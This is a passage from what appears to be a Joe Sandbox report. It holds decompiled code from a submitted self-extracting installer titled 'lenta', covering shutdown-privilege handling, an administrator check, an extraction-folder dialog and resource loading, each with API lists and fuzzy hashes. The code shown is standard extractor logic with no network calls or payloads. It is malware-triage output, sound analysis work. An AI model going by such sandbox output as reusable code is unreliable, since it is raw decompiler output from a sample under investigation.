                            							_v8 = _t13 ^ _t46;
                            							_push(_t38);
                            							if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v28) != 0) {
                            								LookupPrivilegeValueA(0, "SeShutdownPrivilege",  &(_v24.Privileges));
                            								_v24.PrivilegeCount = 1;
                            								_v12 = 2;
                            								_t21 = AdjustTokenPrivileges(_v28, 0,  &_v24, 0, 0, 0);
                            								CloseHandle(_v28);
                            								_t41 = _t41;
                            								_push(0);
                            								if(_t21 != 0) {
                            									if(ExitWindowsEx(2, ??) != 0) {
                            										_t25 = 1;
                            									} else {
                            										_t37 = 0x4f7;
                            										goto L3;
                            									}
                            								} else {
                            									_t37 = 0x4f6;
                            									goto L4;
                            								}
                            							} else {
                            								_t37 = 0x4f5;
                            								L3:
                            								_push(0);
                            								L4:
                            								_push(0x10);
                            								_push(0);
                            								_push(0);
                            								E00EB44B9(0, _t37);
                            								_t25 = 0;
                            							}
                            							_pop(_t40);
                            							return E00EB6CE0(_t25, _t30, _v8 ^ _t44, _t37, _t40, _t41);
                            						} else {
                            							_t28 = ExitWindowsEx(2, 0);
                            							goto L16;
                            						}
                            					} else {
                            						_t37 = 0x522;
                            						_t28 = E00EB44B9(0, 0x522, 0xeb1140, 0, 0x40, 4);
                            						if(_t28 != 6) {
                            							goto L16;
                            						} else {
                            							goto L14;
                            						}
                            					}
                            				} else {
                            					__eax = E00EB1EA7(__ecx);
                            					if(__eax != 2) {
                            						L16:
                            						return _t28;
                            					} else {
                            						goto L12;
                            					}
                            				}
                            			}

















                            0x00eb1f90
                            0x00eb1f90
                            0x00eb1f93
                            0x00eb1f98
                            0x00eb1fa4
                            0x00eb1fa7
                            0x00eb1fc5
                            0x00eb1fcd
                            0x00eb1fdb
                            0x00eb1ee5
                            0x00eb1eea
                            0x00eb1ef1
                            0x00eb1ef4
                            0x00eb1f0c
                            0x00eb1f2e
                            0x00eb1f3a
                            0x00eb1f46
                            0x00eb1f4d
                            0x00eb1f58
                            0x00eb1f60
                            0x00eb1f61
                            0x00eb1f62
                            0x00eb1f75
                            0x00eb1f80
                            0x00eb1f77
                            0x00eb1f77
                            0x00000000
                            0x00eb1f77
                            0x00eb1f64
                            0x00eb1f64
                            0x00000000
                            0x00eb1f64
                            0x00eb1f0e
                            0x00eb1f0e
                            0x00eb1f13
                            0x00eb1f13
                            0x00eb1f14
                            0x00eb1f14
                            0x00eb1f16
                            0x00eb1f17
                            0x00eb1f1a
                            0x00eb1f1f
                            0x00eb1f1f
                            0x00eb1f86
                            0x00eb1f8f
                            0x00eb1fcf
                            0x00eb1fd3
                            0x00000000
                            0x00eb1fd3
                            0x00eb1fa9
                            0x00eb1fb4
                            0x00eb1fbb
                            0x00eb1fc3
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00eb1fc3
                            0x00eb1f9a
                            0x00eb1f9a
                            0x00eb1fa2
                            0x00eb1fd9
                            0x00eb1fda
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00eb1fa2

                            APIs
                            • GetCurrentProcess.KERNEL32(00000028,?,?), ref: 00EB1EFB
                            • OpenProcessToken.ADVAPI32(00000000), ref: 00EB1F02
                            • ExitWindowsEx.USER32(00000002,00000000), ref: 00EB1FD3
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.320002965.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                            • Associated: 00000000.00000002.319923981.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.320287724.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.320579701.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.320579701.0000000000EBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_eb0000_file.jbxd
                            Similarity
                            • API ID: Process$CurrentExitOpenTokenWindows
                            • String ID: SeShutdownPrivilege
                            • API String ID: 2795981589-3733053543
                            • Opcode ID: bed30463e5d530ccd16366883cb47a23db024e416168ea43883c4022656a2751
                            • Instruction ID: 7dad1e0a5da6da364f4e1b3cc9e42b5791d48fc398702a481ac163a49e0e602a
                            • Opcode Fuzzy Hash: bed30463e5d530ccd16366883cb47a23db024e416168ea43883c4022656a2751
                            • Instruction Fuzzy Hash: 592129B1B002057FDB205BA69C1AFFF76BCEF85B64F541168FA02F6181D7748805D661
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 57%
                            			E00EB17EE(intOrPtr* __ecx) {
                            				signed int _v8;
                            				short _v12;
                            				struct _SID_IDENTIFIER_AUTHORITY _v16;
                            				_Unknown_base(*)()* _v20;
                            				void* _v24;
                            				intOrPtr* _v28;
                            				void* __ebx;
                            				void* __edi;
                            				void* __esi;
                            				signed int _t14;
                            				_Unknown_base(*)()* _t20;
                            				long _t28;
                            				void* _t35;
                            				struct HINSTANCE__* _t36;
                            				signed int _t38;
                            				intOrPtr* _t39;
                            
                            				_t14 =  *0xeb8004; // 0x92ae1240
                            				_v8 = _t14 ^ _t38;
                            				_v12 = 0x500;
                            				_t37 = __ecx;
                            				_v16.Value = 0;
                            				_v28 = __ecx;
                            				_t28 = 0;
                            				_t36 = LoadLibraryA("advapi32.dll");
                            				if(_t36 != 0) {
                            					_t20 = GetProcAddress(_t36, "CheckTokenMembership");
                            					_v20 = _t20;
                            					if(_t20 != 0) {
                            						 *_t37 = 0;
                            						_t28 = 1;
                            						if(AllocateAndInitializeSid( &_v16, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v24) != 0) {
                            							_t37 = _t39;
                            							 *0xeba288(0, _v24, _v28);
                            							_v20();
                            							if(_t39 != _t39) {
                            								asm("int 0x29");
                            							}
                            							FreeSid(_v24);
                            						}
                            					}
                            					FreeLibrary(_t36);
                            				}
                            				return E00EB6CE0(_t28, _t28, _v8 ^ _t38, _t35, _t36, _t37);
                            			}



















                            0x00eb17f6
                            0x00eb17fd
                            0x00eb1805
                            0x00eb180b
                            0x00eb180d
                            0x00eb1815
                            0x00eb1818
                            0x00eb1820
                            0x00eb1824
                            0x00eb182c
                            0x00eb1832
                            0x00eb1837
                            0x00eb1851
                            0x00eb1854
                            0x00eb185d
                            0x00eb1862
                            0x00eb186c
                            0x00eb1872
                            0x00eb1877
                            0x00eb187e
                            0x00eb187e
                            0x00eb1883
                            0x00eb1883
                            0x00eb185d
                            0x00eb188a
                            0x00eb188a
                            0x00eb18a2

                            APIs
                            • LoadLibraryA.KERNEL32(advapi32.dll,00000002,?,00000000,?,?,?,00EB18DD), ref: 00EB181A
                            • GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 00EB182C
                            • AllocateAndInitializeSid.ADVAPI32(00EB18DD,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,00EB18DD), ref: 00EB1855
                            • FreeSid.ADVAPI32(?,?,?,?,00EB18DD), ref: 00EB1883
                            • FreeLibrary.KERNEL32(00000000,?,?,?,00EB18DD), ref: 00EB188A
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.320002965.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                            • Associated: 00000000.00000002.319923981.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.320287724.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.320579701.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.320579701.0000000000EBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_eb0000_file.jbxd
                            Similarity
                            • API ID: FreeLibrary$AddressAllocateInitializeLoadProc
                            • String ID: CheckTokenMembership$advapi32.dll
                            • API String ID: 4204503880-1888249752
                            • Opcode ID: 0133285995e38bf5d53560256f8e440debd14f6cb876085bc613d127dfc8854c
                            • Instruction ID: eced8f0c9b92391d0cc5089ea9ca6ddd6af0f6c37e62cd7ae2ef52cb6247259a
                            • Opcode Fuzzy Hash: 0133285995e38bf5d53560256f8e440debd14f6cb876085bc613d127dfc8854c
                            • Instruction Fuzzy Hash: 43119331E00209AFDB15AFA5DC5AABFBBB8FF44710F540179FA01F2290DA309D048B91
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E00EB6CF0(char _a4) {
                            
                            				SetUnhandledExceptionFilter(0);
                            				_t1 =  &_a4; // 0xeb6e26
                            				UnhandledExceptionFilter( *_t1);
                            				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
                            			}



                            0x00eb6cf7
                            0x00eb6cfd
                            0x00eb6d00
                            0x00eb6d19

                            APIs
                            • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00EB6E26,00EB1000), ref: 00EB6CF7
                            • UnhandledExceptionFilter.KERNEL32(&n,?,00EB6E26,00EB1000), ref: 00EB6D00
                            • GetCurrentProcess.KERNEL32(C0000409,?,00EB6E26,00EB1000), ref: 00EB6D0B
                            • TerminateProcess.KERNEL32(00000000,?,00EB6E26,00EB1000), ref: 00EB6D12
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.320002965.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                            • Associated: 00000000.00000002.319923981.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.320287724.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.320579701.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.320579701.0000000000EBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_eb0000_file.jbxd
                            Similarity
                            • API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
                            • String ID: &n
                            • API String ID: 3231755760-661210962
                            • Opcode ID: fb9c1ad42f0b6d20b370099aee61d86f5450dc33b5f4a98276a26cd92fcad884
                            • Instruction ID: f1a48d65745b3f932cfd67069c1af06cd711090cfe726fbd61e777a7459fca42
                            • Opcode Fuzzy Hash: fb9c1ad42f0b6d20b370099aee61d86f5450dc33b5f4a98276a26cd92fcad884
                            • Instruction Fuzzy Hash: A3D0C9F2001108BFDF812BEAEC0CA6A3F2CEB48212F4C4120F319A2020CA3244558B52
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E00EB7176(signed int __eax, void* __edi, signed int __esi) {
                            				signed int _t32;
                            				signed int _t33;
                            				signed int _t35;
                            				void* _t36;
                            				signed int _t38;
                            				void* _t40;
                            
                            				_t38 = __esi;
                            				_t36 = __edi;
                            				if(__eax == __edi || (__esi & __eax) == 0) {
                            					GetSystemTimeAsFileTime(_t40 - 0xc);
                            					 *(_t40 - 4) =  *(_t40 - 8) ^  *(_t40 - 0xc);
                            					 *(_t40 - 4) =  *(_t40 - 4) ^ GetCurrentProcessId();
                            					 *(_t40 - 4) =  *(_t40 - 4) ^ GetCurrentThreadId();
                            					 *(_t40 - 4) = GetTickCount() ^  *(_t40 - 4) ^ _t40 - 0x00000004;
                            					QueryPerformanceCounter(_t40 - 0x14);
                            					_t32 =  *(_t40 - 0x10) ^  *(_t40 - 0x14) ^  *(_t40 - 4);
                            					_t35 = _t32;
                            					if(_t32 == _t36 || ( *0xeb8004 & _t38) == 0) {
                            						_t32 = 0xbb40e64f;
                            						_t35 = 0xbb40e64f;
                            					}
                            					 *0xeb8004 = _t35;
                            				}
                            				_t33 =  !_t32;
                            				 *0xeb8008 = _t33;
                            				return _t33;
                            			}









                            0x00eb7176
                            0x00eb7176
                            0x00eb7178
                            0x00eb7182
                            0x00eb718e
                            0x00eb7197
                            0x00eb71a0
                            0x00eb71b1
                            0x00eb71b8
                            0x00eb71c4
                            0x00eb71c7
                            0x00eb71cb
                            0x00eb71d5
                            0x00eb71da
                            0x00eb71da
                            0x00eb71dc
                            0x00eb71dc
                            0x00eb71e2
                            0x00eb71e5
                            0x00eb71ee

                            APIs
                            • GetSystemTimeAsFileTime.KERNEL32(?), ref: 00EB7182
                            • GetCurrentProcessId.KERNEL32 ref: 00EB7191
                            • GetCurrentThreadId.KERNEL32 ref: 00EB719A
                            • GetTickCount.KERNEL32 ref: 00EB71A3
                            • QueryPerformanceCounter.KERNEL32(?), ref: 00EB71B8
                            Memory Dump Source
                            • Source File: 00000000.00000002.320002965.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                            • Associated: 00000000.00000002.319923981.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.320287724.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.320579701.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.320579701.0000000000EBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_eb0000_file.jbxd
                            Similarity
                            • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                            • String ID:
                            • API String ID: 1445889803-0
                            • Opcode ID: 8646df125b20164b652ad45c578a9f9cb92ca55029cfac35446c8cb8a055a6a5
                            • Instruction ID: 4cb7109ec732299dbd359c0240bf948cf96a849a1569fa5efce486c27a7addcf
                            • Opcode Fuzzy Hash: 8646df125b20164b652ad45c578a9f9cb92ca55029cfac35446c8cb8a055a6a5
                            • Instruction Fuzzy Hash: 9301C2B0D06209DF8F00DFB9EA485AFB7F5AB48304F645A66D801F7210EA309A088A01
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 76%
                            			E00EB3210(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12) {
                            				void* __edi;
                            				void* _t6;
                            				void* _t10;
                            				int _t20;
                            				int _t21;
                            				int _t23;
                            				char _t24;
                            				long _t25;
                            				int _t27;
                            				int _t30;
                            				void* _t32;
                            				int _t33;
                            				int _t34;
                            				int _t37;
                            				int _t38;
                            				int _t39;
                            				void* _t42;
                            				void* _t46;
                            				CHAR* _t49;
                            				void* _t58;
                            				void* _t63;
                            				struct HWND__* _t64;
                            
                            				_t64 = _a4;
                            				_t6 = _a8 - 0x10;
                            				if(_t6 == 0) {
                            					_push(0);
                            					L38:
                            					EndDialog(_t64, ??);
                            					L39:
                            					__eflags = 1;
                            					return 1;
                            				}
                            				_t42 = 1;
                            				_t10 = _t6 - 0x100;
                            				if(_t10 == 0) {
                            					E00EB43D0(_t64, GetDesktopWindow());
                            					SetWindowTextA(_t64, "lenta");
                            					SendDlgItemMessageA(_t64, 0x835, 0xc5, 0x103, 0);
                            					__eflags =  *0xeb9a40 - _t42; // 0x3
                            					if(__eflags == 0) {
                            						EnableWindow(GetDlgItem(_t64, 0x836), 0);
                            					}
                            					L36:
                            					return _t42;
                            				}
                            				if(_t10 == _t42) {
                            					_t20 = _a12 - 1;
                            					__eflags = _t20;
                            					if(_t20 == 0) {
                            						_t21 = GetDlgItemTextA(_t64, 0x835, 0xeb91e4, 0x104);
                            						__eflags = _t21;
                            						if(_t21 == 0) {
                            							L32:
                            							_t58 = 0x4bf;
                            							_push(0);
                            							_push(0x10);
                            							_push(0);
                            							_push(0);
                            							L25:
                            							E00EB44B9(_t64, _t58);
                            							goto L39;
                            						}
                            						_t49 = 0xeb91e4;
                            						do {
                            							_t23 =  *_t49;
                            							_t49 =  &(_t49[1]);
                            							__eflags = _t23;
                            						} while (_t23 != 0);
                            						__eflags = _t49 - 0xeb91e5 - 3;
                            						if(_t49 - 0xeb91e5 < 3) {
                            							goto L32;
                            						}
                            						_t24 =  *0xeb91e5; // 0x3a
                            						__eflags = _t24 - 0x3a;
                            						if(_t24 == 0x3a) {
                            							L21:
                            							_t25 = GetFileAttributesA(0xeb91e4);
                            							__eflags = _t25 - 0xffffffff;
                            							if(_t25 != 0xffffffff) {
                            								L26:
                            								E00EB658A(0xeb91e4, 0x104, 0xeb1140);
                            								_t27 = E00EB58C8(0xeb91e4);
                            								__eflags = _t27;
                            								if(_t27 != 0) {
                            									__eflags =  *0xeb91e4 - 0x5c;
                            									if( *0xeb91e4 != 0x5c) {
                            										L30:
                            										_t30 = E00EB597D(0xeb91e4, 1, _t64, 1);
                            										__eflags = _t30;
                            										if(_t30 == 0) {
                            											L35:
                            											_t42 = 1;
                            											__eflags = 1;
                            											goto L36;
                            										}
                            										L31:
                            										_t42 = 1;
                            										EndDialog(_t64, 1);
                            										goto L36;
                            									}
                            									__eflags =  *0xeb91e5 - 0x5c;
                            									if( *0xeb91e5 == 0x5c) {
                            										goto L31;
                            									}
                            									goto L30;
                            								}
                            								_push(0);
                            								_push(0x10);
                            								_push(0);
                            								_push(0);
                            								_t58 = 0x4be;
                            								goto L25;
                            							}
                            							_t32 = E00EB44B9(_t64, 0x54a, 0xeb91e4, 0, 0x20, 4);
                            							__eflags = _t32 - 6;
                            							if(_t32 != 6) {
                            								goto L35;
                            							}
                            							_t33 = CreateDirectoryA(0xeb91e4, 0);
                            							__eflags = _t33;
                            							if(_t33 != 0) {
                            								goto L26;
                            							}
                            							_push(0);
                            							_push(0x10);
                            							_push(0);
                            							_push(0xeb91e4);
                            							_t58 = 0x4cb;
                            							goto L25;
                            						}
                            						__eflags =  *0xeb91e4 - 0x5c;
                            						if( *0xeb91e4 != 0x5c) {
                            							goto L32;
                            						}
                            						__eflags = _t24 - 0x5c;
                            						if(_t24 != 0x5c) {
                            							goto L32;
                            						}
                            						goto L21;
                            					}
                            					_t34 = _t20 - 1;
                            					__eflags = _t34;
                            					if(_t34 == 0) {
                            						EndDialog(_t64, 0);
                            						 *0xeb9124 = 0x800704c7;
                            						goto L39;
                            					}
                            					__eflags = _t34 != 0x834;
                            					if(_t34 != 0x834) {
                            						goto L36;
                            					}
                            					_t37 = LoadStringA( *0xeb9a3c, 0x3e8, 0xeb8598, 0x200);
                            					__eflags = _t37;
                            					if(_t37 != 0) {
                            						_t38 = E00EB4224(_t64, _t46, _t46);
                            						__eflags = _t38;
                            						if(_t38 == 0) {
                            							goto L36;
                            						}
                            						_t39 = SetDlgItemTextA(_t64, 0x835, 0xeb87a0);
                            						__eflags = _t39;
                            						if(_t39 != 0) {
                            							goto L36;
                            						}
                            						_t63 = 0x4c0;
                            						L9:
                            						E00EB44B9(_t64, _t63, 0, 0, 0x10, 0);
                            						_push(0);
                            						goto L38;
                            					}
                            					_t63 = 0x4b1;
                            					goto L9;
                            				}
                            				return 0;
                            			}

























                            0x00eb321b
                            0x00eb321e
                            0x00eb3221
                            0x00eb343c
                            0x00eb343e
                            0x00eb343f
                            0x00eb3445
                            0x00eb3447
                            0x00000000
                            0x00eb3447
                            0x00eb3229
                            0x00eb322a
                            0x00eb322f
                            0x00eb33ec
                            0x00eb33f7
                            0x00eb3410
                            0x00eb3416
                            0x00eb341d
                            0x00eb342d
                            0x00eb342d
                            0x00eb3438
                            0x00000000
                            0x00eb3438
                            0x00eb3237
                            0x00eb3243
                            0x00eb3243
                            0x00eb3246
                            0x00eb32ee
                            0x00eb32f4
                            0x00eb32f6
                            0x00eb33d4
                            0x00eb33d6
                            0x00eb33db
                            0x00eb33dc
                            0x00eb33de
                            0x00eb33df
                            0x00eb3370
                            0x00eb3372
                            0x00000000
                            0x00eb3372
                            0x00eb32fc
                            0x00eb3301
                            0x00eb3301
                            0x00eb3303
                            0x00eb3304
                            0x00eb3304
                            0x00eb330a
                            0x00eb330d
                            0x00000000
                            0x00000000
                            0x00eb3313
                            0x00eb3318
                            0x00eb331a
                            0x00eb3331
                            0x00eb3332
                            0x00eb333a
                            0x00eb333d
                            0x00eb337c
                            0x00eb3388
                            0x00eb338f
                            0x00eb3394
                            0x00eb3396
                            0x00eb33a4
                            0x00eb33ab
                            0x00eb33b6
                            0x00eb33be
                            0x00eb33c3
                            0x00eb33c5
                            0x00eb3435
                            0x00eb3437
                            0x00eb3437
                            0x00000000
                            0x00eb3437
                            0x00eb33c7
                            0x00eb33c9
                            0x00eb33cc
                            0x00000000
                            0x00eb33cc
                            0x00eb33ad
                            0x00eb33b4
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00eb33b4
                            0x00eb3398
                            0x00eb3399
                            0x00eb339b
                            0x00eb339c
                            0x00eb339d
                            0x00000000
                            0x00eb339d
                            0x00eb334c
                            0x00eb3351
                            0x00eb3354
                            0x00000000
                            0x00000000
                            0x00eb335c
                            0x00eb3362
                            0x00eb3364
                            0x00000000
                            0x00000000
                            0x00eb3366
                            0x00eb3367
                            0x00eb3369
                            0x00eb336a
                            0x00eb336b
                            0x00000000
                            0x00eb336b
                            0x00eb331c
                            0x00eb3323
                            0x00000000
                            0x00000000
                            0x00eb3329
                            0x00eb332b
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00eb332b
                            0x00eb324c
                            0x00eb324c
                            0x00eb324f
                            0x00eb32c8
                            0x00eb32ce
                            0x00000000
                            0x00eb32ce
                            0x00eb3251
                            0x00eb3256
                            0x00000000
                            0x00000000
                            0x00eb3271
                            0x00eb3277
                            0x00eb3279
                            0x00eb3298
                            0x00eb329d
                            0x00eb329f
                            0x00000000
                            0x00000000
                            0x00eb32b0
                            0x00eb32b6
                            0x00eb32b8
                            0x00000000
                            0x00000000
                            0x00eb32be
                            0x00eb3280
                            0x00eb3289
                            0x00eb328e
                            0x00000000
                            0x00eb328e
                            0x00eb327b
                            0x00000000
                            0x00eb327b
                            0x00000000

                            APIs
                            • LoadStringA.USER32(000003E8,00EB8598,00000200), ref: 00EB3271
                            • GetDesktopWindow.USER32 ref: 00EB33E2
                            • SetWindowTextA.USER32(?,lenta), ref: 00EB33F7
                            • SendDlgItemMessageA.USER32(?,00000835,000000C5,00000103,00000000), ref: 00EB3410
                            • GetDlgItem.USER32(?,00000836), ref: 00EB3426
                            • EnableWindow.USER32(00000000), ref: 00EB342D
                            • EndDialog.USER32(?,00000000), ref: 00EB343F
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.320002965.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                            • Associated: 00000000.00000002.319923981.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.320287724.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.320579701.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.320579701.0000000000EBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_eb0000_file.jbxd
                            Similarity
                            • API ID: Window$Item$DesktopDialogEnableLoadMessageSendStringText
                            • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$lenta
                            • API String ID: 2418873061-4030079312
                            • Opcode ID: 17eeb5d4fb62b33e62bd9262784ffadc03e1b8bae94f47697dec276f5ff1df40
                            • Instruction ID: eefbb37ae53683378c140bc7f31e6b82c6f14a3058253179a8e49fe9bdc9ef37
                            • Opcode Fuzzy Hash: 17eeb5d4fb62b33e62bd9262784ffadc03e1b8bae94f47697dec276f5ff1df40
                            • Instruction Fuzzy Hash: B9516B70382240BFEB211B3A5C4FFFB699DDB46B58F146238F251F61D1CEA48A05D261
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 93%
                            			E00EB2CAA(struct HINSTANCE__* __ecx, void* __edx, void* __eflags) {
                            				signed int _v8;
                            				char _v268;
                            				void* __ebx;
                            				void* __edi;
                            				void* __esi;
                            				signed int _t13;
                            				void* _t20;
                            				void* _t23;
                            				void* _t27;
                            				struct HRSRC__* _t31;
                            				intOrPtr _t33;
                            				void* _t43;
                            				void* _t48;
                            				signed int _t65;
                            				struct HINSTANCE__* _t66;
                            				signed int _t67;
                            
                            				_t13 =  *0xeb8004; // 0x92ae1240
                            				_v8 = _t13 ^ _t67;
                            				_t65 = 0;
                            				_t66 = __ecx;
                            				_t48 = __edx;
                            				 *0xeb9a3c = __ecx;
                            				memset(0xeb9140, 0, 0x8fc);
                            				memset(0xeb8a20, 0, 0x32c);
                            				memset(0xeb88c0, 0, 0x104);
                            				 *0xeb93ec = 1;
                            				_t20 = E00EB468F("TITLE", 0xeb9154, 0x7f);
                            				if(_t20 == 0 || _t20 > 0x80) {
                            					_t64 = 0x4b1;
                            					goto L32;
                            				} else {
                            					_t27 = CreateEventA(0, 1, 1, 0);
                            					 *0xeb858c = _t27;
                            					SetEvent(_t27);
                            					_t64 = 0xeb9a34;
                            					if(E00EB468F("EXTRACTOPT", 0xeb9a34, 4) != 0) {
                            						if(( *0xeb9a34 & 0x000000c0) == 0) {
                            							L12:
                            							 *0xeb9120 =  *0xeb9120 & _t65;
                            							if(E00EB5C9E(_t48, _t48, _t65, _t66) != 0) {
                            								if( *0xeb8a3a == 0) {
                            									_t31 = FindResourceA(_t66, "VERCHECK", 0xa);
                            									if(_t31 != 0) {
                            										_t65 = LoadResource(_t66, _t31);
                            									}
                            									if( *0xeb8184 != 0) {
                            										__imp__#17();
                            									}
                            									if( *0xeb8a24 == 0) {
                            										_t57 = _t65;
                            										if(E00EB36EE(_t65) == 0) {
                            											goto L33;
                            										} else {
                            											_t33 =  *0xeb9a40; // 0x3
                            											_t48 = 1;
                            											if(_t33 == 1 || _t33 == 2 || _t33 == 3) {
                            												if(( *0xeb9a34 & 0x00000100) == 0 || ( *0xeb8a38 & 0x00000001) != 0 || E00EB18A3(_t64, _t66) != 0) {
                            													goto L30;
                            												} else {
                            													_t64 = 0x7d6;
                            													if(E00EB6517(_t57, 0x7d6, _t34, E00EB19E0, 0x547, 0x83e) != 0x83d) {
                            														goto L33;
                            													} else {
                            														goto L30;
                            													}
                            												}
                            											} else {
                            												L30:
                            												_t23 = _t48;
                            											}
                            										}
                            									} else {
                            										_t23 = 1;
                            									}
                            								} else {
                            									E00EB2390(0xeb8a3a);
                            									goto L33;
                            								}
                            							} else {
                            								_t64 = 0x520;
                            								L32:
                            								E00EB44B9(0, _t64, 0, 0, 0x10, 0);
                            								goto L33;
                            							}
                            						} else {
                            							_t64 =  &_v268;
                            							if(E00EB468F("INSTANCECHECK",  &_v268, 0x104) == 0) {
                            								goto L3;
                            							} else {
                            								_t43 = CreateMutexA(0, 1,  &_v268);
                            								 *0xeb8588 = _t43;
                            								if(_t43 == 0 || GetLastError() != 0xb7) {
                            									goto L12;
                            								} else {
                            									if(( *0xeb9a34 & 0x00000080) == 0) {
                            										_t64 = 0x524;
                            										if(E00EB44B9(0, 0x524, ?str?, 0, 0x20, 4) == 6) {
                            											goto L12;
                            										} else {
                            											goto L11;
                            										}
                            									} else {
                            										_t64 = 0x54b;
                            										E00EB44B9(0, 0x54b, "lenta", 0, 0x10, 0);
                            										L11:
                            										CloseHandle( *0xeb8588);
                            										 *0xeb9124 = 0x800700b7;
                            										goto L33;
                            									}
                            								}
                            							}
                            						}
                            					} else {
                            						L3:
                            						_t64 = 0x4b1;
                            						E00EB44B9(0, 0x4b1, 0, 0, 0x10, 0);
                            						 *0xeb9124 = 0x80070714;
                            						L33:
                            						_t23 = 0;
                            					}
                            				}
                            				return E00EB6CE0(_t23, _t48, _v8 ^ _t67, _t64, _t65, _t66);
                            			}



















                            0x00eb2cb5
                            0x00eb2cbc
                            0x00eb2cc7
                            0x00eb2cc9
                            0x00eb2cd1
                            0x00eb2cd3
                            0x00eb2cd9
                            0x00eb2ce9
                            0x00eb2cf9
                            0x00eb2d0e
                            0x00eb2d15
                            0x00eb2d1c
                            0x00eb2ef3
                            0x00000000
                            0x00eb2d2d
                            0x00eb2d34
                            0x00eb2d3b
                            0x00eb2d40
                            0x00eb2d48
                            0x00eb2d59
                            0x00eb2d84
                            0x00eb2e1f
                            0x00eb2e1f
                            0x00eb2e2e
                            0x00eb2e41
                            0x00eb2e5a
                            0x00eb2e62
                            0x00eb2e6c
                            0x00eb2e6c
                            0x00eb2e75
                            0x00eb2e77
                            0x00eb2e77
                            0x00eb2e84
                            0x00eb2e8b
                            0x00eb2e94
                            0x00000000
                            0x00eb2e96
                            0x00eb2e96
                            0x00eb2e9e
                            0x00eb2ea2
                            0x00eb2eba
                            0x00000000
                            0x00eb2ece
                            0x00eb2ede
                            0x00eb2eed
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00eb2eed
                            0x00eb2eef
                            0x00eb2eef
                            0x00eb2eef
                            0x00eb2eef
                            0x00eb2ea2
                            0x00eb2e86
                            0x00eb2e88
                            0x00eb2e88
                            0x00eb2e43
                            0x00eb2e48
                            0x00000000
                            0x00eb2e48
                            0x00eb2e30
                            0x00eb2e30
                            0x00eb2ef8
                            0x00eb2f01
                            0x00000000
                            0x00eb2f01
                            0x00eb2d8a
                            0x00eb2d8f
                            0x00eb2da1
                            0x00000000
                            0x00eb2da3
                            0x00eb2dae
                            0x00eb2db4
                            0x00eb2dbb
                            0x00000000
                            0x00eb2dca
                            0x00eb2dd3
                            0x00eb2df5
                            0x00eb2e02
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00eb2dd5
                            0x00eb2dde
                            0x00eb2de3
                            0x00eb2e04
                            0x00eb2e0a
                            0x00eb2e10
                            0x00000000
                            0x00eb2e10
                            0x00eb2dd3
                            0x00eb2dbb
                            0x00eb2da1
                            0x00eb2d5b
                            0x00eb2d5b
                            0x00eb2d5d
